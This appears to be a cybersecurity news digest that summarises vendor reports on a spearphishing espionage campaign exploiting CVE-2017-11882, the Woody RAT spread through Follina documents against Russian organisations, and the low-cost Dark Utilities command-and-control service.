At a glance.
- Cyberespionage targets industrial entities.
- Woody RAT used against Russian organizations.
- Dark Utilities facilitates attacks.
Cyberespionage targets industrial entities.
Kaspersky in January observed a targeted cyberespionage campaign against "industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan." The attackers were able to compromise dozens of the targeted entities with spearphishing emails that would install commodity malware:
"The attackers penetrated the enterprise network using carefully crafted phishing emails, some of which use information that is specific to the organization under attack and is not publicly available. This could indicate that the attackers did preparatory work in advance (they may have obtained the information in earlier attacks on the same organization or its employees, or on other organizations or individuals associated with the victim organization).
"Microsoft Word documents attached to the phishing emails contained malicious code that exploits the CVE-2017-11882 vulnerability. The vulnerability enables an attacker to execute arbitrary code (in the attacks analyzed, the main module of the PortDoor malware) without any additional user activity."
Woody RAT used against Russian organizations.
Malwarebytes describes a newly discovered remote access Trojan dubbed "Woody RAT" that's being used by an unknown threat actor to target Russian organizations, including a "Russian aerospace and defense entity known as OAK." The malware is delivered via Microsoft Word documents that use the Follina vulnerability:
"Based on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.
"The earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by @MalwareHunterTeam."
Dark Utilities facilitates attacks.
Cisco Talos outlines a new C2 platform called "Dark Utilities" that was released earlier this year. The platform is being offered for cheap, and has already attracted around 3,000 customers:
"Dark Utilities provides payloads consisting of code that is executed on victim systems, allowing them to be registered with the service and establish a command and control (C2) communications channel. The platform currently supports Windows, Linux and Python-based payloads, allowing adversaries to target multiple architectures without requiring significant development resources. During our analysis, we observed efforts underway to expand OS and system architecture support as the platform continues to see ongoing development activities occurring.
"The platform, hosted on the clear internet and Tor network, offers premium access to the platform, associated payloads and API endpoints for 9.99 euros. At the time of writing, the platform had enrolled roughly 3,000 users, which is approximately 30,000 euros in income. Given the relatively low cost compared to the amount of functionality the platform offers, it is likely attractive to adversaries attempting to compromise systems without requiring them to create their own C2 implementation within their malware payloads."